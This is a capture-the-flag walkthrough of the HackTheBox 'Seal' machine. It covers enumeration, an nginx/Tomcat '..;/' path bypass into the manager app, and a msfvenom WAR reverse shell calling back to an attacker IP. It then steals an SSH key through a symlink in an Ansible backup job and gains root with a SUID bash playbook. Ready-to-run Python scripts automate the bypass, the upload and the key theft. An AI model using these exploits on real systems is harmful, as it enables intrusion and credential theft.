SEAL
Scanning
NMAP
➜ ~ sudo nmap -F seal.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-19 08:24 EDT
Nmap scan report for seal.htb (10.10.10.250)
Host is up (0.16s latency).
Not shown: 97 closed ports
PORT STATE SERVICE
22/tcp open ssh
443/tcp open https
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 1.16 seconds
The fast scan finishes in 1.16 seconds; look at these three ports while the full -p- -A scan runs (it took 709 seconds).
➜ ~ sudo nmap -T4 -p- -A seal.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-19 08:13 EDT
Nmap scan report for seal.htb (10.10.10.250)
Host is up (0.22s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 4b:89:47:39:67:3d:07:31:5e:3f:4c:27:41:1f:f9:67 (RSA)
| 256 04:a7:4f:39:95:65:c5:b0:8d:d5:49:2e:d8:44:00:36 (ECDSA)
|_ 256 b4:5e:83:93:c5:42:49:de:71:25:92:71:23:b1:85:54 (ED25519)
443/tcp open ssl/http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Seal Market
| ssl-cert: Subject: commonName=seal.htb/organizationName=Seal Pvt Ltd/stateOrProvinceName=London/countryName=UK
| Not valid before: 2021-05-05T10:24:03
|_Not valid after: 2022-05-05T10:24:03
| tls-alpn:
|_ http/1.1
| tls-nextprotoneg:
|_ http/1.1
8080/tcp open http-proxy
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 401 Unauthorized
| Date: Thu, 19 Aug 2021 12:23:54 GMT
| Set-Cookie: JSESSIONID=node01frvnjr75rhdfsbmdepqve4n287.node0; Path=/; HttpOnly
| Expires: Thu, 01 Jan 1970 00:00:00 GMT
| Content-Type: text/html;charset=utf-8
| Content-Length: 0
| GetRequest:
| HTTP/1.1 401 Unauthorized
| Date: Thu, 19 Aug 2021 12:23:52 GMT
| Set-Cookie: JSESSIONID=node05b59i0stcc6s1ffnbtlbvqhoe85.node0; Path=/; HttpOnly
| Expires: Thu, 01 Jan 1970 00:00:00 GMT
| Content-Type: text/html;charset=utf-8
| Content-Length: 0
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Thu, 19 Aug 2021 12:23:53 GMT
| Set-Cookie: JSESSIONID=node01ru35o66qwp7pncfzoorb2jyt86.node0; Path=/; HttpOnly
| Expires: Thu, 01 Jan 1970 00:00:00 GMT
| Content-Type: text/html;charset=utf-8
| Allow: GET,HEAD,POST,OPTIONS
| Content-Length: 0
| RPCCheck:
| HTTP/1.1 400 Illegal character OTEXT=0x80
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 71
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
| RTSPRequest:
| HTTP/1.1 505 Unknown Version
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 58
| Connection: close
| <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
| Socks4:
| HTTP/1.1 400 Illegal character CNTL=0x4
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x4</pre>
| Socks5:
| HTTP/1.1 400 Illegal character CNTL=0x5
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x5</pre>
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Server returned status 401 but no WWW-Authenticate header.
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 1720/tcp)
HOP RTT ADDRESS
1 128.44 ms 10.10.16.1
2 228.82 ms seal.htb (10.10.10.250)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 709.02 seconds
Enumeration
port 8080
Port 8080 is a GitBucket instance. Register an account and sign in.
At first look we find a few usernames: root, luis, alex.
Scrolling the news feed we find this entry; open it ...
<user username="tomcat" password="42MrHBf*z8{Z%" roles="manager-gui,admin-gui"/>
That is a tomcat-users.xml entry: credentials tomcat:42MrHBf*z8{Z%, with the manager-gui and admin-gui roles.
Try to sign in to GitBucket with them ... ERROR
Try the other usernames ... logged in as luis with the same password, luis:42MrHBf*z8{Z%
Nothing interesting here for now.
port 443
Directory busting
From the error page and the GitBucket repository we know the backend is Tomcat, so use the tomcat wordlist (-k skips verification of the seal.htb certificate):
➜ ~ gobuster dir -u https://seal.htb/ -w ~/SecLists/Discovery/Web-Content/tomcat.txt -k
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://seal.htb/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /home/x/SecLists/Discovery/Web-Content/tomcat.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/08/19 09:44:14 Starting gobuster in directory enumeration mode
===============================================================
/examples/%2e%2e/manager/html (Status: 403) [Size: 162]
/examples/../manager/html (Status: 403) [Size: 162]
/host-manager (Status: 302) [Size: 0] [--> http://seal.htb/host-manager/]
/host-manager/html/* (Status: 403) [Size: 162]
/manager (Status: 302) [Size: 0] [--> http://seal.htb/manager/]
/manager/html (Status: 403) [Size: 162]
/manager/html/* (Status: 403) [Size: 162]
/manager/jmxproxy (Status: 401) [Size: 2499]
/manager/jmxproxy/* (Status: 401) [Size: 2499]
/manager/status/* (Status: 401) [Size: 2499]
/manager/status.xsd (Status: 200) [Size: 4374]
===============================================================
2021/08/19 09:44:18 Finished
===============================================================
/manager/status.xsd answers 200 with no auth, and /manager/status/* and /manager/jmxproxy answer 401, so the manager app is there behind nginx and wants HTTP Basic auth. Try tomcat:42MrHBf*z8{Z%
we IN 👏
Exploit
Trying Path Traversal
You need to read the gobuster output carefully first: /manager/html and /host-manager/html come back 403 from nginx, while /manager/status/* and /manager/jmxproxy come back 401 from Tomcat. nginx decodes and collapses ../ and %2e%2e itself (those variants are 403 too), but it does not touch a segment like ..; whereas Tomcat strips the ;... path parameter from each segment and then resolves the .. So this URL passes nginx and is served by Tomcat as /manager/html:
https://seal.htb/manager/status/..;/html
It prompts for Basic auth; tomcat:42MrHBf*z8{Z% opens the Application Manager.
The manager-gui role only unlocks this HTML interface (not /manager/text), but that is enough: the page has a WAR upload form, and a deployed WAR runs as the tomcat user.
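To make the parser mismatch concrete, here is an added example (my own code, not part of the original write-up) that models how nginx and Tomcat each normalize the same path. The deny rule in BLOCKED_PREFIXES is an assumption that reproduces the 403s gobuster reported; the real nginx config of seal.htb is not shown on this page, and the function names are mine.

```python
# Added example, not from the original write-up: a toy model of the parser
# mismatch behind /manager/status/..;/html. nginx percent-decodes and collapses
# ../ itself (that is why the %2e%2e and ../ variants from gobuster are 403 too)
# but treats ';' as an ordinary character, so "..;" is just a directory name
# to it. Tomcat strips the ";..." path parameter from every segment first (the
# same mechanism as ;jsessionid=...) and only then resolves "..". The deny rule
# in BLOCKED_PREFIXES is an assumption that reproduces the 403s seen above; the
# real nginx config of seal.htb is not shown in the write-up.
from urllib.parse import unquote

# Assumed nginx rule: refuse the HTML manager interfaces, proxy everything else.
BLOCKED_PREFIXES = ("/manager/html", "/host-manager/html")


def normalize(path: str, strip_path_params: bool) -> str:
    """Percent-decode, then collapse '.' and '..' segments (never above '/')."""
    out = []
    for seg in unquote(path).split("/"):
        if strip_path_params:
            seg = seg.split(";", 1)[0]   # Tomcat: "..;" -> ".."
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)


def nginx_view(path: str) -> str:
    """The path nginx matches its location rules against."""
    return normalize(path, strip_path_params=False)


def tomcat_view(path: str) -> str:
    """The path Tomcat maps to a servlet after its own normalization."""
    return normalize(path, strip_path_params=True)


def nginx_forwards(path: str) -> bool:
    return not nginx_view(path).startswith(BLOCKED_PREFIXES)


def reaches_manager_html(path: str) -> bool:
    """True when the front end lets the request through AND Tomcat lands it on /manager/html."""
    return nginx_forwards(path) and tomcat_view(path).startswith("/manager/html")


if __name__ == "__main__":
    for p in ("/manager/html",
              "/examples/../manager/html",
              "/examples/%2e%2e/manager/html",
              "/manager/status/..;/html",
              "/manager/jmxproxy/..;/html/upload"):
        print(f"{p:38} forwarded={nginx_forwards(p)!s:5} tomcat={tomcat_view(p):22} bypass={reaches_manager_html(p)}")
```

Only the ..; variants come out with forwarded=True and tomcat=/manager/html...; everything nginx can normalize itself is refused at the front door.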
Generate a JSP reverse shell packaged as a WAR with msfvenom:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.30 LPORT=9999 -f war -o rshell.war
Set up the Metasploit listener (the JSP payload is a plain TCP shell, so the default generic/shell_reverse_tcp handler is fine):
➜ sudo msfdb run
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set lhost 10.10.16.30
lhost => 10.10.16.30
msf6 exploit(multi/handler) > set lport 9999
lport => 9999
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.16.30:9999
The upload form posts to /manager/html/upload, so submitting it straight from the browser hits nginx's 403 and we lose our traversal. Intercept the POST in Burp and rewrite only the path:
/manager/jmxproxy/..;/html/upload
Leave the CSRF_NONCE query parameter and the multipart body exactly as they are (the nonce is tied to the JSESSIONID the browser already holds).
Uploaded successfully. The manager answers with a redirect to /manager/html/list, which nginx blocks; that is fine, the WAR is already deployed.
Trigger it by requesting the new context, /rshell/ for rshell.war ...
We have a reverse shell as the tomcat user.
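The same upload done from a script, as an added example (my own code, not the author's Burp session). It assumes Tomcat 9 manager defaults that the page does not spell out: the file field is named deployWar, the POST must carry the org.apache.catalina.filters.CSRF_NONCE query parameter from the manager page plus the JSESSIONID cookie of that same session, and a successful upload is answered with a 302 to /manager/html/list (which nginx would 403, so redirects are deliberately not followed). Host, credentials and the WAR name are the ones used above.

```python
# Added example, not part of the original write-up: deploy the WAR through the
# ..;/ bypass from a script instead of hand-editing the POST in Burp.
# Assumptions (Tomcat 9 manager defaults; the box's nginx config is not shown):
# the upload form's file field is named "deployWar", the POST must carry the
# org.apache.catalina.filters.CSRF_NONCE query parameter from the manager page
# and the JSESSIONID cookie of the session that issued it, and the server
# answers a successful upload with a 302 to /manager/html/list (which nginx
# would 403, so redirects are deliberately not followed).
import base64
import http.cookiejar
import re
import ssl
import urllib.error
import urllib.request

MANAGER_HTML = "/manager/status/..;/html"            # nginx forwards, Tomcat maps to /manager/html
UPLOAD_PATH = "/manager/jmxproxy/..;/html/upload"   # same trick for the upload target
NONCE_RE = re.compile(r"org\.apache\.catalina\.filters\.CSRF_NONCE=([0-9A-Fa-f]+)")


def extract_nonce(html: str) -> str:
    """Pull the CSRF nonce out of a manager page; the upload servlet rejects POSTs without it."""
    m = NONCE_RE.search(html)
    if not m:
        raise ValueError("no CSRF_NONCE in page: wrong path, or not the manager HTML interface")
    return m.group(1)


def basic_auth(user: str, password: str) -> str:
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def build_multipart(filename: str, data: bytes, boundary: str = "----sealwar") -> tuple:
    """Hand-rolled multipart/form-data body with the single deployWar file field."""
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="deployWar"; filename="{filename}"\r\n'
        "Content-Type: application/octet-stream\r\n\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return f"multipart/form-data; boundary={boundary}", head + data + tail


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Turn every 3xx into an HTTPError so the 302 after upload is reported, not followed."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def make_opener() -> urllib.request.OpenerDirector:
    ctx = ssl.create_default_context()
    ctx.check_hostname = False          # seal.htb presents its own certificate
    ctx.verify_mode = ssl.CERT_NONE
    return urllib.request.build_opener(
        urllib.request.HTTPSHandler(context=ctx),
        urllib.request.HTTPCookieProcessor(http.cookiejar.CookieJar()),  # keeps JSESSIONID
        NoRedirect(),
    )


def deploy(base: str, user: str, password: str, war_path: str) -> int:
    """Fetch the manager page for a nonce+session, then POST the WAR. Returns the HTTP status."""
    opener = make_opener()
    auth = {"Authorization": basic_auth(user, password)}
    with opener.open(urllib.request.Request(base + MANAGER_HTML, headers=auth)) as r:
        nonce = extract_nonce(r.read().decode(errors="replace"))
    with open(war_path, "rb") as f:
        ctype, body = build_multipart(war_path.rsplit("/", 1)[-1], f.read())
    req = urllib.request.Request(
        f"{base}{UPLOAD_PATH}?org.apache.catalina.filters.CSRF_NONCE={nonce}",
        data=body, method="POST", headers={**auth, "Content-Type": ctype},
    )
    try:
        with opener.open(req) as r:
            return r.status
    except urllib.error.HTTPError as e:
        return e.code


if __name__ == "__main__":
    status = deploy("https://seal.htb", "tomcat", "42MrHBf*z8{Z%", "rshell.war")
    # 302 = the manager accepted the WAR; it is now live at /rshell/ (the WAR's name).
    # Requesting https://seal.htb/rshell/ runs the JSP and connects back to the listener.
    print("deployed, hit /rshell/ to trigger" if status == 302 else f"unexpected status {status}")
```

Start the multi/handler first, run the script, then request /rshell/ yourself; a 403 here means a redirect was followed into the blocked path or the nonce came from a different session than the POST.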
Privilege Escalation
What's running here? ps aux shows a cron job that runs an Ansible playbook as luis every 30 seconds:
/bin/sh -c sleep 30 && sudo -u luis /usr/bin/ansible-playbook /opt/backups/playbook/run.yml
cat /opt/backups/playbook/run.yml
- hosts: localhost
  tasks:
    - name: Copy Files
      synchronize: src=/var/lib/tomcat9/webapps/ROOT/admin/dashboard dest=/opt/backups/files copy_links=yes
    - name: Server Backups
      archive:
        path: /opt/backups/files/
        dest: "/opt/backups/archives/backup-{{ansible_date_time.date}}-{{ansible_date_time.time}}.gz"
    - name: Clean
      file:
        state: absent
        path: /opt/backups/files/
Backup Script
The playbook rsyncs the dashboard directory with copy_links=yes (rsync follows symlinks and copies whatever they point to), archives the result, and the whole job runs as luis. The uploads directory under dashboard is writable by the tomcat user, so link luis's .ssh into it and let the next run back it up (uploads already exists, so this creates uploads/.ssh):
ln -s /home/luis/.ssh/ /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads
Find the archive name after the next run (about 30 seconds):
ls /opt/backups/archives/
Copy it somewhere we can work on it:
cp /opt/backups/archives/backup-2021-07-13-03:00:32.gz rsa.gz
It is a gzip-compressed tar (the archive module tars a directory before compressing), so decompress and unpack:
gzip -kd rsa.gz
tar -xf rsa
Follow the path to the private key:
cd dashboard/uploads/.ssh
cat id_rsa
Copy it to your local machine, chmod 600 it, and ssh in as luis with it.
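The same steps automated, as an added example (my own code, not the author's): plant the link, wait for a fresh archive, and read the key out of the tar in memory rather than unpacking it on disk. Paths come from run.yml and the 30-second interval from the ps output; constructed_archive() only builds test data shaped like that backup and is an assumption, not something taken from the box.

```python
# Added example, not part of the original write-up: the symlink trick above,
# automated, and the key read straight out of the backup in memory.
# Paths come from run.yml; the 30-second interval is the one in the ps output.
# The archive is treated as a gzip-compressed tar, which is what the archive
# module produces for a directory path with a .gz dest. constructed_archive()
# only builds test data shaped like that backup; it is an assumption, not
# something taken from the box.
import io
import os
import tarfile
import time
from typing import Optional, Union

UPLOADS = "/var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads"  # writable by tomcat, rsync'd by the job
ARCHIVES = "/opt/backups/archives"
TARGET = "/home/luis/.ssh"


def plant_symlink(uploads: str = UPLOADS, target: str = TARGET) -> str:
    """Create uploads/.ssh -> /home/luis/.ssh. synchronize ... copy_links=yes makes
    rsync copy the link target, and the job runs as luis, who can read it."""
    link = os.path.join(uploads, ".ssh")
    if not os.path.islink(link):
        os.symlink(target, link)
    return link


def newest_archive(archives: str = ARCHIVES, newer_than: float = 0.0) -> Optional[str]:
    """Most recent backup-* file created after newer_than (so we do not grab an old run)."""
    cands = [os.path.join(archives, n) for n in os.listdir(archives) if n.startswith("backup-")]
    cands = [p for p in cands if os.path.getmtime(p) > newer_than]
    return max(cands, key=os.path.getmtime) if cands else None


def key_from_archive(archive: Union[str, bytes], member_suffix: str = "/.ssh/id_rsa") -> Optional[str]:
    """Return the first member ending in member_suffix, read from the tar without extracting
    to disk (so a hostile member name can never write outside the working directory)."""
    fobj = io.BytesIO(archive) if isinstance(archive, bytes) else open(archive, "rb")
    with fobj, tarfile.open(fileobj=fobj, mode="r:gz") as tar:
        for m in tar.getmembers():
            if m.isfile() and m.name.endswith(member_suffix):
                return tar.extractfile(m).read().decode()
    return None


def wait_for_key(timeout: float = 120.0, poll: float = 5.0) -> Optional[str]:
    """Plant the link, then poll for a fresh archive that contains the key."""
    start = time.time()
    plant_symlink()
    while time.time() - start < timeout:
        arc = newest_archive(newer_than=start)
        if arc:
            key = key_from_archive(arc)
            if key:
                return key
        time.sleep(poll)
    return None


def constructed_archive(key_text: str) -> bytes:
    """Constructed test data: a backup laid out the way run.yml + the symlink produce it."""
    buf = io.BytesIO()
    data = key_text.encode()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        info = tarfile.TarInfo("dashboard/uploads/.ssh/id_rsa")
        info.size = len(data)
        info.mode = 0o600
        tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


if __name__ == "__main__":
    key = wait_for_key()
    print(key if key else "no fresh archive with id_rsa; is the cron job still running?")
```

Run it from the tomcat shell and paste the printed key into a 0600 file locally. Reading the member in memory is the safer habit in general: extracting an archive someone else wrote with tar -x on a shared box lets a crafted member path overwrite files you did not intend.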
Root User
Check sudo rights with sudo -l: luis can run /usr/bin/ansible-playbook as root, so whatever playbook we hand it executes as root.
Read these first if Ansible playbooks are new to you ...
https://www.redhat.com/en/topics/automation/what-is-an-ansible-playbook
https://www.middlewareinventory.com/blog/ansible-command-examples/
Create a playbook with any name, say root.yml, whose task drops a root-owned SUID copy of bash, and run it with sudo /usr/bin/ansible-playbook root.yml.
Then start the copy with -p. From the bash man page:
-p Turned on whenever the real and effective user ids do not match. Disables processing of the $ENV file and importing of shell functions. Turning this option off causes the effective uid and gid to be set to the real uid and gid.
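An added example of such a playbook (my own, not the file the author used, which this write-up does not show; the name root.yml and the /tmp/rootbash path are arbitrary choices): the copy module with remote_src copies /bin/bash on the box itself and sets mode 4755, which is the SUID bit plus rwxr-xr-x.

```yaml
# root.yml (added example): run as luis with
#   sudo /usr/bin/ansible-playbook root.yml
# ansible-playbook itself is already root under sudo, so no become: is needed.
- hosts: localhost
  connection: local
  gather_facts: no
  tasks:
    - name: Drop a root-owned SUID copy of bash
      copy:
        src: /bin/bash
        dest: /tmp/rootbash       # arbitrary path, assumption
        remote_src: yes           # copy on the target, not from the controller
        owner: root
        group: root
        mode: '4755'              # SUID bit set; quote it so YAML keeps the leading 4
```

Afterwards /tmp/rootbash -p gives a root shell. Without -p bash notices that the effective uid (root) differs from the real uid (luis) and resets the effective uid to the real one, which is exactly what the man page excerpt above describes; -p keeps the privilege.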